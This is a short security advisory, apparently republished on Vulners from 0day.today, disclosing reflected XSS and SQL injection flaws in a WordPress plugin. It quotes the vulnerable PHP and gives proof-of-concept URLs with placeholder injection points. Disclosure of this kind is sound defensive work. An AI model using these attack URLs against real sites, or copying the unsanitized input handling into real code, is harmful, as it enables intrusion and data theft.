Lucene search
+L

Google Alert And Twitter WP Plugin v. 3.1.5 XSS Exploit & SQL Injection

🗓️ 25 Feb 2013 00:00:00Reported by Dan FoscoType 
zdt
 zdt
🔗 0day.today👁 20 Views

Google Alert And Twitter Plugin v. 3.1.5 XSS & SQL Injectio

Code
Google Alert And Twitter Plugin v. 3.1.5 XSS Exploit & SQL Injection
vendor url: www.galertplugin.com

Researcher: Dan Fosco
Home: www.dfcode.org

XSS:

<-- Vulnerable Code on activation.php -->

...
	$message = '';
	if( isset($_GET['msg']) )
	{
		$message = '<div class="updated"><p>'.$_GET['msg'].'</p></div>';
	}
...
<a href="http://galertplugin.com/training.html"><img src="http://galertplugin.com/images/training.jpg" width="197" height="61" alt="training" /></a>
		<?php echo $message; ?> 
        <form action="" method="POST" enctype="form-data">
...

<-- End Vulnerable Code -->

POC: url/wp-content/plugins/googlealertandtwitter/activation.php?msg=">INJECT CODE HERE

SQL Injection:

<-- Vulnerable Code on add_emails.php -->

...
elseif($_REQUEST['action']=='edit')
{
	$id = $_REQUEST['EID'];
	$action	= $_REQUEST['action'];
	$query	= $wpdb->get_results("SELECT * FROM add_email WHERE `id` = '".$id."'");
...

<-- End Vulnerable Code -->

POC: url/wp-content/plugins/googlealertandtwitter/add_emails.php?action=edit&EID=' SQL INJECTION

#  0day.today [2018-03-28]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Feb 2013 00:00Current
6.9Medium risk
Vulners AI Score6.9
20